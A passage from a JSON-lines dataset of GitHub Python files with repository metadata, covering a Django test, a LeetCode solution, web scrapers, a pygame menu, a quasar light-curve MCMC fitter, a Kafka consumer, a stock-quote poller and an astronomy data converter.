import_urethane(wb):\n urethane = []\n ws = wb['urethane']\n rows = ws.rows\n for row in rows:\n urethane.append(row[0].value)\n return 
urethane\n\ndef import_vestibule(wb):\n    vestibule = []\n    ws = wb['vestibule']\n    rows = ws.rows\n    for row in rows:\n        vestibule.append(row[0].value)\n    return vestibule\n\ndef import_set(wb):\n    set = []\n    ws = wb['set']\n    rows = ws.rows\n    for row in rows:\n        set.append(row[0].value)\n    return set\n\ndef import_keywords(excel_keywords_path):\n    keywords = {}\n    wb = openpyxl.load_workbook(excel_keywords_path)\n    keywords[\"models\"] = import_models(wb)\n    keywords[\"divs\"] = import_divs(wb)\n    keywords[\"gus\"] = import_gus(wb)\n    keywords[\"colors\"] = import_colors(wb)\n    keywords[\"limited\"] = import_limited(wb)\n    keywords[\"groundsheet\"] = import_groundsheet(wb)\n    keywords[\"inner_tent\"] = import_inner_tent(wb)\n    keywords[\"urethane\"] = import_urethane(wb)\n    keywords[\"vestibule\"] = import_vestibule(wb)\n    keywords[\"set\"] = import_set(wb)\n    return keywords","repo_name":"q7y331xk/chocam-scrapper-console","sub_path":"excel/import_keywords.py","file_name":"import_keywords.py","file_ext":"py","file_size_in_byte":2872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10573904085","text":"from urllib.parse import urljoin\n\nfrom selenium.webdriver.common.by import By\nfrom django.urls import reverse_lazy\n\nfrom base_test.functional_tests import BaseFunctionalTest\nfrom .utils import get_letting\n\n\nclass LettingTest(BaseFunctionalTest):\n\n    def test_index(self):\n        for browser in self.browsers:\n            browser.get(urljoin(self.live_server_url, str(reverse_lazy('lettings:index'))))\n            h1_title = browser.find_element(By.TAG_NAME, 'h1')\n            self.assertEqual(\n                h1_title.text,\n                'Lettings'\n            )\n\n    def test_letting(self):\n        (letting, address) = get_letting()\n        for browser in self.browsers:\n            browser.get(\n                urljoin(\n                    self.live_server_url,\n                    str(reverse_lazy('lettings:letting', kwargs={'letting_id': letting.id}))\n                )\n            )\n            h1_title = browser.find_element(By.TAG_NAME, 'h1')\n            self.assertEqual(\n                h1_title.text,\n                letting.title\n            )\n","repo_name":"Nemesix493/Python-OC-Lettings-FR","sub_path":"lettings/tests/functional_tests.py","file_name":"functional_tests.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"21151454674","text":"class Solution:\n    def restoreIpAddresses(self, s: str) -> List[str]:\n        # Definition of valid IP address:\n        # 1. The length of the ip without '.' should be equal to the length of s;\n        # 2. The digit order of ip should be same as the digit order of s;\n        # 3. Each part separated by the '.' should not start with '0' except only '0';\n        # 4. Each part separated by the '.' 
should not be larger than 255;\n\n        if len(s) > 12:\n            return []\n        ret = []\n\n        self.backtrack(s, [[]], 0, ret)\n\n        return ret\n\n    def backtrack(self, s: str, components: List[List[str]],\n                  i: int, ret: List[str]):\n        if i == len(s):\n            # done\n            if len(components) == 4:\n                if self.is_valid(components[-1]):\n                    components_str = [''.join(component) for component in components]\n                    ret.append('.'.join(components_str))\n        else:\n            # Option 1: finish current component, make a new component:\n            if self.is_valid(components[-1]):\n                new_component = [s[i]]\n                components.append(new_component)\n                self.backtrack(s, components, i + 1, ret)\n                # unchoose:\n                components.pop()\n\n            # Option 2: add the current digit to the current component\n            components[-1].append(s[i])\n            self.backtrack(s, components, i + 1, ret)\n            # unchoose\n            components[-1].pop()\n\n    def is_valid(self, component: List[str]):\n        if len(component) == 0:\n            return False\n\n        if component[0] == \"0\":\n            return len(component) == 1\n\n        val = int(''.join(component))\n        return val <= 255\n","repo_name":"nhatsmrt/AlgorithmPractice","sub_path":"LeetCode/93. Restore IP Addresses/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"17361895322","text":"class RecordRes:\n    def __init__(self):\n        self.productImage = \"\"\n        self.detailPageImage = []\n        self.title = \"\"\n        self.originalPrice = \"\"\n        self.discountPrice = \"\"\n        self.sold = \"X\"\n        self.artist = \"\"\n        self.publisher = \"\"\n        self.label = \"\"\n        self.productCode = \"\"\n        self.barcode = \"\"\n        self.releaseDate = \"\"\n        self.weight = \"\"\n        self.details = \"\"\n","repo_name":"mgh3326/synnara_crawling","sub_path":"record/model/RecordRes.py","file_name":"RecordRes.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32197204882","text":"import requests\nfrom bs4 import BeautifulSoup\n\nquote_page = requests.get(\"https://www.builtinnyc.com/jobs?f[0]=job-category_data-analytics\")\n\nsoup = BeautifulSoup(quote_page.text,'html.parser')\n\ntitle_box = soup.find('h2', attrs={'class' : 'title'})\ntitle = title_box.text.strip()\nprint(title)\n\ncompany_box = soup.find('div', attrs={'class' : 'company-title'})\ncompany = company_box.text.strip()\nprint(company)\n\nimport csv\nwith open('index1.csv', 'a') as filecsv:\n\twriter = csv.writer(filecsv)\n\twriter.writerow([title,company])\n\n\n","repo_name":"ravina13/Web_scrape","sub_path":"scrape_ex.py","file_name":"scrape_ex.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72657069812","text":"from class_screen import Screen\nimport pygame\n\nclass ScreenMenu(Screen):\n    def __init__(self):\n        Screen.__init__(self)\n\n        self.font = pygame.font.Font(\"assets/fonts/monobit.ttf\", 32)\n        self.fontcol_normal = pygame.Color(230,230,230)\n        self.fontcol_sel = pygame.Color(50,200,200)\n        self.fontcol_input = pygame.Color(50,50,200)\n\n        self.menu_buttons = []\n        self.menu_selected = 0\n\n        self.inputting = False\n\n        self.backg_rect = (0, 0, 0, 0)\n\n    def reset(self):\n        Screen.reset(self)\n        self.inputting = False\n        self.menu_selected = 0\n\n    # Creates a menu button - action is name of screen to switch to if not input, or attribute name to set if input\n    def create_button(self, action, text, is_input=False):\n        tmp_button = MenuButton(action, text, 
is_input)\n tmp_button.connect_input(self, action)\n self.menu_buttons.append(tmp_button)\n return tmp_button\n\n def handle_event(self, event):\n if event.type == pygame.KEYDOWN:\n if not self.inputting:\n if event.key == pygame.K_w or event.key == pygame.K_UP:\n self.menu_selected -= 1\n if self.menu_selected < 0:\n self.menu_selected = len(self.menu_buttons) - 1\n\n elif event.key == pygame.K_s or event.key == pygame.K_DOWN:\n self.menu_selected += 1\n if self.menu_selected > len(self.menu_buttons) - 1:\n self.menu_selected = 0\n\n else:\n # Currently selected button\n sel_button = self.menu_buttons[self.menu_selected]\n\n if not event.key == pygame.K_RETURN:\n if event.key == pygame.K_BACKSPACE:\n sel_button.input_text = sel_button.input_text[:-1]\n self.update_backg_size()\n\n elif event.key == pygame.K_ESCAPE:\n self.inputting = False\n\n elif len(sel_button.input_text) < sel_button.input_maxlen:\n if not sel_button.input_number:\n sel_button.input_text += event.unicode\n else:\n try: sel_button.input_text += str(int(event.unicode))\n except ValueError: pass\n\n self.update_backg_size()\n\n if event.key == pygame.K_RETURN:\n self.button_press()\n\n return Screen.handle_event(self, event)\n\n def button_press(self):\n pressed_button = self.menu_buttons[self.menu_selected]\n if pressed_button.input:\n self.inputting = not self.inputting\n if not self.inputting:\n pressed_button.input_done()\n\n else:\n self.newscreen = pressed_button.action\n\n # Update buttons' background rectangle size\n def update_backg_size(self):\n # Width is based on longest text string in current menu's buttons\n tmp_width = 0\n # Height is measured between first and last buttons' Y coordinates\n tmp_height_min, tmp_height_max = None, None\n\n for button in self.menu_buttons:\n # Width\n tmp_len = len(button.text + button.input_text)\n if tmp_len > tmp_width:\n tmp_width = len(button.text + button.input_text)\n # Height\n button_y = button.y + 4\n if tmp_height_min is None:\n tmp_height_min = button_y\n tmp_height_max = button_y\n\n if button_y < tmp_height_min:\n tmp_height_min = button_y\n elif button_y > tmp_height_max:\n tmp_height_max = button_y\n\n backg_width = tmp_width * 12\n backg_height = tmp_height_max - tmp_height_min + 48\n backg_x = self.display.get_width() / 2 - backg_width / 2\n backg_y = tmp_height_min - 24\n self.backg_rect = (backg_x, backg_y, backg_width, backg_height)\n\n def loop(self, framerate):\n for event in pygame.event.get():\n if not self.handle_event(event):\n return False\n\n pygame.draw.rect(self.display, (0, 0, 0), self.backg_rect)\n pygame.draw.rect(self.display, (255, 255, 255), self.backg_rect, 2)\n for i, button in enumerate(self.menu_buttons):\n tmp_color = self.fontcol_normal\n if i == self.menu_selected:\n if self.inputting and button.input:\n tmp_color = self.fontcol_input\n else:\n tmp_color = self.fontcol_sel\n\n button.render(self.font, self.display, tmp_color)\n\n return Screen.loop(self, framerate)\n\nclass MenuButton(object):\n def __init__(self, action, text, input=False):\n self.action = action\n self.text = text\n\n self.input = input\n self.input_hidden = False # Converts input text to asterisks (for passwords)\n self.input_number = False # Accepts only numbers for input\n self.input_maxlen = 20\n self.input_text = \"\"\n\n # Input attribute connection - sets a target object's attribute to this button's input text\n self.input_target = None # Target object to change\n self.input_target_val = None # Name of attribute to change\n\n def set_pos(self, x, y):\n 
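# centre of the button in screen space; render() builds the text rect\n        # around this point each frame\n        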
self.x, self.y = x, y\n\n def connect_input(self, target, value):\n self.input_target = target\n self.input_target_val = value\n\n def input_done(self):\n setattr(self.input_target, self.input_target_val, self.input_text)\n\n def render(self, font, tgt_surface, color):\n inp = self.input_text\n if self.input_hidden: # Hide input for passwords\n tmp_txt_len = len(inp)\n inp = \"\"\n for i in range(tmp_txt_len):\n inp += \"*\"\n\n tmp_text = font.render(self.text + inp, False, color)\n text_rect = tmp_text.get_rect(center=(self.x, self.y))\n tgt_surface.blit(tmp_text, text_rect)","repo_name":"AbAeterno8445/AUO","sub_path":"AUO-Client/class_screen_menu.py","file_name":"class_screen_menu.py","file_ext":"py","file_size_in_byte":6050,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"36070508898","text":"import numpy as np\nfrom numpy import mean, median\nfrom astropy.stats import sigma_clip\nimport scipy.signal as sig\n#from lomb_scargle_red_fix import lomb\nfrom astroML.time_series import lomb_scargle\nimport os, subprocess\nfrom scipy.optimize import curve_fit\nimport emcee\nimport scipy.optimize as op\n\n\nclass quasar_drw:\n \"\"\" This version directly fits state space \"\"\"\n \n def __init__(self, time, signal, error, redshift, preprocess=True):\n self.time = np.array(time, dtype=np.float64)\n self.signal = np.array(signal, dtype=np.float64)\n self.error = np.array(error, dtype=np.float64)\n self.redshift = float(redshift)\n self._preprocessed = False\n \n if ( len(time) != len(signal) ) or ( len(time)!= len(error) ):\n print(\"[quasar_drw] Error in input data: time, signal, error must have the same length.\")\n \n self._sort_data()\n if preprocess == True:\n self._preprocess()\n \n self.__initiate()\n \n\n \n def __initiate(self):\n ## parameters for periodogram\n if (len(self.time) >= 2 and float( np.max(self.time) - np.min(self.time) ) > 0.0 ):\n self.__Tspan = float( np.max(self.time) - np.min(self.time) )\n self.__Ndata = len(self.signal)\n self.__psd_freq = \\\n np.linspace(1.0/self.__Tspan, self.__Ndata/(2.0*self.__Tspan), self.__Ndata) \n self.__dt = self.__Tspan / float(self.__Ndata)\n self.__df = self.__psd_freq[1] - self.__psd_freq[0]\n else:\n pass\n \n \n def get_Tspan(self):\n if (len(self.time) >= 2):\n return self.__Tspan\n else:\n pass\n \n def get_Ndata(self):\n if (len(self.time) >= 2):\n return self.__Ndata\n else:\n pass\n \n def get_psd_freq(self):\n return self.__psd_freq\n \n def get_psd_time(self):\n return 1.0/self.__psd_freq\n \n def get_psd_time_err(self):\n period = self.get_psd_time()\n return (self.__df * period**2.)/2.\n \n \n def _preprocess(self):\n #self._sort_data()\n self._no_outlier()\n self._bin_data()\n self._preprocessed = True\n self.__initiate()\n \n \n \n def get_lc(self):\n \"\"\" output: time, signal, error \"\"\"\n return (self.time, self.signal, self.error)\n \n \n def get_redshift(self):\n return self.redshift\n \n \n def add_lc(self, time, signal, error, preprocess=True):\n self.time = np.array(np.append(self.time, time), dtype=np.float64) \n self.signal = np.array(np.append(self.signal, signal), dtype=np.float64)\n self.error = np.array(np.append(self.error, error), dtype=np.float64)\n \n self._sort_data()\n \n self._preprocessed = False\n \n if (preprocess == True):\n self._preprocess()\n \n self.__initiate()\n \n \n \n def ls_astroML(self):\n \"\"\"\n calculate periodogram using generalized Lomb-Scargle periodogram from AstroML\n function description: 
http://www.astroml.org/modules/generated/astroML.time_series.lomb_scargle.html\n example: http://www.astroml.org/book_figures/chapter10/fig_LS_example.html\n \"\"\"\n LS_lc = lomb_scargle(self.time, self.signal, self.error, self.__psd_freq*(2.0*np.pi), generalized=True)\n \n return 1.0/self.__psd_freq, LS_lc\n \n \n ### ********************************* ###\n ### for drw modeling ###\n ### ********************************* ###\n \n def fit_drw_emcee(self, nwalkers=500, burnin=150, Nstep=500):\n ndim = 3\n pos = []\n \n z = self.redshift\n time = self.time\n signal = self.signal\n error = self.error\n \n # use most likely val as a initial guess\n nll = lambda *args: -lnlike(*args)\n result = op.minimize(nll, [np.log(300.), np.log(0.01**2.0), np.log(np.mean(signal)/300.)], args=(self.time, self.signal, self.error, self.redshift))\n \n tau_center = np.exp(result[\"x\"][0])\n c_center = np.exp(result[\"x\"][1])\n b_center = np.exp(result[\"x\"][2])\n \n print(\"Initial guess of (tau, c, b) = (\" + format(np.exp(result[\"x\"][0]), \".2f\") + \", \" \\\n + format(np.exp(result[\"x\"][1]), \".2e\") + \", \" \\\n + format(np.exp(result[\"x\"][2]), \".2f\") + \" )\" )\n \n ## initiate a gaussian distribution aroun dthe mean value\n ## modify this part if needed\n tau_sample = np.random.lognormal(mean=np.log(tau_center), sigma=1.0, size=nwalkers)\n c_sample = np.random.lognormal(mean=np.log(c_center), sigma=1.5, size=nwalkers)\n b_sample = np.random.lognormal(mean=np.log(b_center), sigma=1.0, size=nwalkers)\n \n tau_sample, c_sample, b_sample = np.log(tau_sample), np.log(c_sample), np.log(b_sample)\n \n for i in range(nwalkers):\n parameter = np.array([tau_sample[i], c_sample[i], b_sample[i]])\n pos.append(parameter)\n \n sampler = emcee.EnsembleSampler(nwalkers, ndim, lnprob, args=(time, signal, error, z), a=4.0)\n \n # start MCMC\n sampler.run_mcmc(pos, Nstep)\n \n # remove burn-in\n burnin = burnin\n samples = sampler.chain[:, burnin:, :].reshape((-1, ndim))\n \n ## depending on the preference, return whatever you prefer\n return samples\n\n \n ### ********************************* ###\n ### helper functions for preprocess ###\n ### ********************************* ###\n \n def _sort_data(self):\n \n # take away points w/o data\n idx = self.error > 0.\n time = self.time[idx]\n signal = self.signal[idx]\n error = self.error[idx]\n \n idx = self.time > 0.\n time = self.time[idx]\n signal = self.signal[idx]\n error = self.error[idx]\n \n \n # sort\n idx = np.argsort(time)\n time = time[idx]\n signal = signal[idx]\n error = error[idx]\n \n # restore data\n self.time = time\n self.signal = signal\n self.error = error\n \n \n def _no_outlier(self, sigma=5, iters=100):\n idx = ((np.abs(self.signal) < 100.) 
& (self.signal > 0.))\n self.time = self.time[idx]\n self.signal = self.signal[idx]\n self.error = self.error[idx]\n \n after_clip = sigma_clip(self.signal, sigma=sigma, iters=iters, cenfunc=median, copy=True)\n \n idx = ~(after_clip.mask)\n self.time = self.time[idx]\n self.signal = self.signal[idx]\n self.error = self.error[idx]\n\n \n def _bin_data(self):\n time2 = []\n signal2 = []\n error2 = []\n count = 0\n \n while(count < len(self.time)):\n idx = ( np.floor(self.time) == np.floor(self.time[count]) )\n signal_temp = self.signal[idx]\n error_temp = self.error[idx]\n nn = len(signal_temp)\n \n signal_temp, error_temp = self.__mag2flux(signal_temp, error_temp)\n signal_temp, error_temp = self.__weighted_mean(signal_temp, error_temp)\n signal_temp, error_temp = self.__flux2mag(signal_temp, error_temp)\n \n time2.append( np.floor(self.time[count]) ) \n signal2.append( signal_temp )\n error2.append( error_temp )\n \n count += nn\n \n self.time = np.asarray(time2)\n self.signal = np.asarray(signal2)\n self.error = np.asarray(error2)\n \n \n ## bin input signal_temp to just one data point\n def _bin(self, signal_temp, error_temp):\n if (len(signal_temp) > 1):\n signal_temp, error_temp = self.__mag2flux(signal_temp, error_temp)\n signal_temp, error_temp = self.__weighted_mean(signal_temp, error_temp)\n signal_temp, error_temp = self.__flux2mag(signal_temp, error_temp)\n \n return signal_temp, error_temp\n \n\n def __mag2flux(self, signal, error):\n flux = 10.**(-1.*signal/2.5)\n return 10.**(-1.*signal/2.5), np.abs( -flux*error*np.log(10.)/2.5 )\n \n \n def __flux2mag(self, signal, error):\n return -2.5*np.log10(signal), np.abs( -2.5* error/signal/np.log(10.))\n \n \n def __weighted_mean(self, signal, error):\n signal_mean = np.sum(signal/error**2.) / np.sum(1./error**2.) \n error_mean = np.sqrt( np.sum(error**2.) 
) / np.sqrt( np.float(len(signal)) )\n        return signal_mean, error_mean\n    \n    ### *********************************** ###\n    ### END of helper func for preprocess  ###\n    ### *********************************** ###\n    \n    \n\n    \n    \n    ##### ------------------------------- #####\n    ##### --- END of quasar_drw class --- #####\n    ##### ------------------------------- #####\n    \n\n\n\n#######################################################\n## ======== Function for MCMC model fitting ======== ##\n#######################################################\ndef likelihood_a(time, tau_fit):\n    Ndata = len(time)\n    a_array = np.zeros(Ndata, dtype=np.float64)\n    \n    for i in range(1, Ndata):\n        a_array[i] = np.exp( -(time[i]-time[i-1])/tau_fit )\n    \n    return a_array\n\n\ndef likelihood_omega(time, error, tau_fit, c_fit):\n    Ndata = len(time)\n    a_array = likelihood_a(time, tau_fit)\n    omega = np.zeros(Ndata, dtype=np.float64)\n    \n    omega[0] = 0.5*tau_fit*c_fit\n    \n    for i in range(1, Ndata):\n        omega[i] = omega[0]*(1.0-a_array[i]**2.0) + \\\n                   a_array[i]**2.0*omega[i-1]*( 1.0- omega[i-1]/(omega[i-1]+error[i-1]**2.0) )\n    \n    return omega\n    \n\ndef likelihood_X(time, signal, error, tau_fit, c_fit, b_fit, X0=0.0):\n    # this is X hat (the fitted X) in Kelly+09\n    Ndata = len(time)\n    a_array = likelihood_a(time, tau_fit)\n    omega = likelihood_omega(time, error, tau_fit, c_fit)\n    signal_0mean = signal - b_fit*tau_fit\n    \n    X_array = np.zeros(Ndata, dtype=np.float64)\n    X_array[0] = X0\n    \n    for i in range(1, Ndata):\n        X_array[i] = a_array[i]*X_array[i-1] + \\\n                     a_array[i]*omega[i-1]/(omega[i-1]+error[i-1]**2.0)*(signal_0mean[i-1] - X_array[i-1])\n    \n    return X_array\n\n\ndef likelihood_P(time, signal, error, tau_fit, c_fit, b_fit):\n    Ndata = len(time)\n    a_array = likelihood_a(time, tau_fit)\n    omega = likelihood_omega(time, error, tau_fit, c_fit)\n    X_array = likelihood_X(time, signal, error, tau_fit, c_fit, b_fit)\n    signal_0mean = signal - b_fit*tau_fit\n    \n    P_array = np.zeros(Ndata, dtype=np.float64)\n    for i in range(Ndata):\n        P_array[i] = 1.0/np.sqrt((2.0*np.pi)*(omega[i]+error[i]**2.0)) * \\\n                     np.exp(-0.5 * ( (X_array[i]-signal_0mean[i])**2.0/(omega[i]+error[i]**2.0) ) )\n    \n    return P_array\n\n\n# set up for likelihood function\ndef lnlike(theta, time, signal, error, z):\n    lntau, lnc, lnb = theta\n    tau_fit = np.exp(lntau) * (1.0+z)\n    c_fit = np.exp(lnc) * np.sqrt(1.0+z)\n    b_fit = np.exp(lnb) / (1.0+z)\n    P_array = likelihood_P(time, signal, error, tau_fit, c_fit, b_fit)\n    Prob = np.prod(P_array)\n    \n    if np.isfinite(Prob) and Prob > 0.:\n        return np.log(Prob)\n    else:\n        return -np.inf\n\n\n# set up for prior \ndef lnprior(theta, z, time): \n    # prior is determined in the rest frame, no need to multiply (1+z)\n    lntau, lnc, lnb = theta\n    tau_fit, c_fit, b_fit = np.exp(lntau), np.exp(lnc), np.exp(lnb)\n    \n    if 1.0 < tau_fit*(1.0+z) < (np.max(time)-np.min(time)) and c_fit > 0.0:\n        return 0.0\n    else:\n        return -np.inf\n\n\n# set up posterior \ndef lnprob(theta, time, signal, error, z): \n    lp = lnprior(theta, z, time)\n    lk = lnlike(theta, time, signal, error, z)\n    \n    if ( np.isfinite(lp) and np.isfinite(lk) ):\n        return lp+lk\n    else:\n        return -np.inf\n    \n########################################\n## ======== END MCMCfunction ======== 
##\n########################################\n\n\n\n","repo_name":"wt-liao/quasar_drw","sub_path":"quasar_drw.py","file_name":"quasar_drw.py","file_ext":"py","file_size_in_byte":12410,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"26473444494","text":"import os \nimport shutil\nimport datetime\n\n\npath = \"C:/Users/jacob/Desktop/Test\"\nfiles = os.listdir(path)\nlistValidFiles = []\nimgExts = [\".png\", \".jpg\", \".jpeg\", \".gif\",\".svg\"]\ncurrentDate = datetime.date.today().__str__()\n\ndef is_image(file):\n    return os.path.splitext(file)[1] in imgExts\n\n#start of main \n    #video folders next, etc etc\n\nfor file in files:\n    rootext = os.path.splitext(os.fspath(file))\n\n    if rootext[1]:\n        listValidFiles.append(file)\n\nif len(listValidFiles) > 0:\n\n    if (os.path.exists(f'{path}/{currentDate}')):\n        print('Error: date path already created')\n\n    else:\n        os.mkdir(path + \"/\" + currentDate)\n\nif (os.path.exists(f'{path}/{currentDate}/Images/')):\n    print('Error: Image path already created')\n\nelse:\n    os.mkdir(f'{path}/{currentDate}/Images/')\n    #add more types of files here\nfor file in listValidFiles:\n    if is_image(file):\n        shutil.move(os.path.join(path, file), f'{path}/{currentDate}/Images/')\n","repo_name":"Blizzardo01/OrganizationProject","sub_path":"OrganizationProject/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20189453854","text":"import logging\nimport pykafka\nfrom pykafka.common import OffsetType\n\nlogging.basicConfig(format='%(message)s', level=logging.DEBUG)\n\nif __name__ == \"__main__\":\n    client = pykafka.KafkaClient(hosts=\"127.0.0.1:9092\")\n    consumer = client.topics[b'service-calls'].get_simple_consumer(\n        auto_offset_reset=OffsetType.EARLIEST,\n        reset_offset_on_start=True\n    )\n    for message in consumer:\n        if message is not None:\n            logging.info(message.value)","repo_name":"YungChunLu/kafka_projectV2","sub_path":"consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4565401234","text":"import re\nimport zipfile\nimport numpy as np\nfrom astropy.io import fits\nimport astropy.units as u\nfrom doodads.modeling.units import WAVELENGTH_UNITS\nfrom .. import utils\nfrom . 
import model_grids\n\n__all__ = ['MANQUI_ATMOSPHERES']\n\n_FILENAME_RE = re.compile(r'^manqui_zd([\\d\\.]+)_pwv([\\d\\.]+).txt$')\n\ndef _convert_manqui_atmospheres(download_filepath, output_filepath):\n    z = zipfile.ZipFile(download_filepath)\n    wavelengths_um = None\n    spectra = None\n    params = None\n    for idx, fileinfo in enumerate(sorted(z.filelist, key=lambda x: x.filename)):\n        name = fileinfo.filename\n        match = _FILENAME_RE.match(name)\n        if match is None:\n            raise ValueError(f\"Unexpected filename in {download_filepath} zipfile: {name}\")\n        zd, pwv = match.groups()\n        zd = float(zd)\n        airmass = 1 / np.cos(np.deg2rad(zd))\n        pwv = float(pwv)\n        with z.open(fileinfo, mode='r') as fh:\n            wls, trans = np.genfromtxt(fh, unpack=True)\n        if spectra is None:\n            spectra = np.zeros((len(z.filelist), len(trans)))\n            wavelengths_um = wls\n            params = np.zeros(len(z.filelist), dtype=[('airmass', float), ('pwv_mm', float)])\n        if wavelengths_um is not None:\n            if not np.all(wls == wavelengths_um):\n                raise RuntimeError(\"Inconsistent sampling\")\n        spectra[idx] = trans\n        params[idx]['airmass'] = airmass\n        params[idx]['pwv_mm'] = pwv\n\n    hdul = fits.HDUList([\n        fits.PrimaryHDU(),\n        fits.BinTableHDU(params, name='PARAMS'),\n        fits.ImageHDU((wavelengths_um * u.um).to(WAVELENGTH_UNITS).value, name='WAVELENGTHS'),\n        fits.ImageHDU(spectra, name='MODEL_SPECTRA'),\n    ])\n    hdul.writeto(output_filepath, overwrite=True)\n\nMANQUI_ATMOSPHERES_DATA = utils.REMOTE_RESOURCES.add_from_url(\n    module=__name__,\n    url='https://magao-x.org/docs/handbook/_static/ref/atm/magaox_manqui_atm.zip',\n    converter_function=_convert_manqui_atmospheres,\n    output_filename='magaox_cerro_manqui_atmosphere_grid.fits',\n)\nMANQUI_ATMOSPHERES_FITS = MANQUI_ATMOSPHERES_DATA.output_filepath\nMANQUI_ATMOSPHERES = model_grids.ModelAtmosphereGrid(MANQUI_ATMOSPHERES_FITS, name=\"LCO Cerro Manqui\")\n","repo_name":"joseph-long/doodads","sub_path":"doodads/ref/magellan_atmospheres.py","file_name":"magellan_atmospheres.py","file_ext":"py","file_size_in_byte":2255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12086676030","text":"import requests\nimport re\nimport time\nimport sys\nfrom datetime import datetime\n\ndef get_Price(var1):\n    match = re.search(\"<LastPrice>\", var1)\n    if not match:\n    \treturn \"Error\"\n    match2 = re.search(\"</LastPrice>\", var1)\n    if not match2:\n    \treturn \"Error\"\n    return match.string[match.end():match2.start()]\n\ndef get_Volume(var1):\n\tmatch = re.search(\"<Volume>\", var1)\n\tif not match:\n\t    return \"Error\"\n\tmatch2 = re.search(\"</Volume>\", var1)\n\tif not match2:\n\t    return \"Error\"\n\treturn match.string[match.end():match2.start()]\n\ndef get_Cap(var1):\n\tmatch = re.search(\"<MarketCap>\", var1)\n\tif not match:\n\t    return \"Error\"\n\tmatch2 = re.search(\"</MarketCap>\", var1)\n\tif not match2:\n\t    return \"Error\"\n\treturn match.string[match.end():match2.start()]\n\ndef get_Time(var1):\n    match = re.search(\"<Timestamp>\", var1)\n    if not match:\n    \treturn \"Error\"\n    match2 = re.search(\"</Timestamp>\", var1)\n    if not match2:\n    \treturn \"Error\"\n    unprocessed = match.string[match.end():match2.start()]\n    processed = process_Time(unprocessed)\n    return processed\n\ndef process_Time(var1):\n    to_Return = \"\"\n    months = {}\n    months[\"Jan\"] = \"1\"\n    months[\"Feb\"] = \"2\"\n    months[\"Mar\"] = \"3\"\n    months[\"Apr\"] = \"4\"\n    months[\"May\"] = \"5\"\n    months[\"Jun\"] = \"6\"\n    months[\"Jul\"] = \"7\"\n    months[\"Aug\"] = \"8\"\n    months[\"Sep\"] = \"9\"\n    months[\"Oct\"] = \"10\"\n    months[\"Nov\"] = \"11\"\n    months[\"Dec\"] = \"12\"\n\n    split 
= re.split(\" \", var1)\n to_Return = to_Return + split[5] + \"-\"\n to_Return = to_Return + months[split[1]] + \"-\" + split[2]\n to_Return = to_Return + \" \" + split[3]\n return to_Return\n\ndef check_Time(times):\n split = re.split(\" \", times)\n times = split[1]\n split = re.split(\":\", times)\n if split[0] == \"15\" and split[1] == \"59\" and split[2] == \"59\":\n return 0\n else: return 1\n\n\n\ntickers = {}\n\ntickers[5] = \"CKEC\" #**\ntickers[6] = \"SRPT\"\ntickers[7] = \"TK\"\ntickers[8] = \"HRG\" #***\ntickers[9] = \"CJES\"\ntickers[10] = \"CIT\"\ntickers[11] = \"TUP\" #***\ntickers[12] = \"BC\" #***\ntickers[13] = \"FITB\"\ntickers[14] = \"LNC\"\ntickers[15] = \"LUK\"\ntickers[16] = \"TRCO\"\ntickers[17] = \"DOX\" #***\ntickers[18] = \"PDLI\"\ntickers[19] = \"XL\"\ntickers[20] = \"CSCO\"\ntickers[21] = \"DIS\"\ntickers[22] = \"DVN\"\ntickers[23] = \"HD\"\ntickers[24] = \"JPM\"\ntickers[25] = \"PFE\"\ntickers[26] = \"S\"\ntickers[27] = \"V\"\ntickers[28] = \"WMT\"\ntickers[29] = \"XOM\"\n\n\n#total_data = {}\n\n#j = 0\n#while j < 30:\n#\tpd_pairs = {}\n#\tprices = []\n#\tdates = []\n#\tpd_pairs = {'Prices' : prices, 'Dates' : dates}\n#\ttotal_data[tickers[j]] = pd_pairs\n#\tj += 1\n\n\nwhile True:\n i = 5\n while i < 30: \n url = 'http://dev.markitondemand.com/Api/v2/Quote/xml'\n data = {}\n data['Content-Length'] = 25\n data['symbol'] = tickers[i]\n r = requests.get(url, params = data)\n output = r.text\n \n # pairs = total_data[tickers[i]]\n # price = pairs['Prices']\n # times = pairs['Dates']\n\n times = get_Time(output)\n check = check_Time(times)\n if check == 0:\n time.sleep(63000)\n continue\n print(tickers[i] + \", \", end=\"\")\n print(times + \", \", end=\"\")\n sys.stdout.flush()\n\n print(get_Price(output) + \", \", end=\"\")\n sys.stdout.flush()\n\n print(get_Cap(output) + \", \", end=\"\")\n sys.stdout.flush()\n\n print(get_Volume(output), end=\"\")\n sys.stdout.flush()\n\n if not i == 29:\n print(\", \", end=\"\")\n sys.stdout.flush()\n # price.append(get_Price(output))\n # times.append(get_Time(output))\n # pairs['Prices'] = price\n # pairs['Dates'] = times\n # total_data[tickers[i]] = pairs\n # print(total_data[tickers[i]])\n i += 1\n time.sleep(12) ### change back to 10\n print()\n\t\n\n\n\n\n#print(match.group(0))\n\n\n\n","repo_name":"jhm4/jhm4.github.io","sub_path":"rQuote.py","file_name":"rQuote.py","file_ext":"py","file_size_in_byte":3805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4551821938","text":"# -*- coding: utf-8 -*-\n\nimport os\nfrom datetime import datetime\nimport shutil\n##Utils copy, etc.\n\ndt = datetime.now()\ncur_date = dt.strftime(\"%A, %d %B %Y 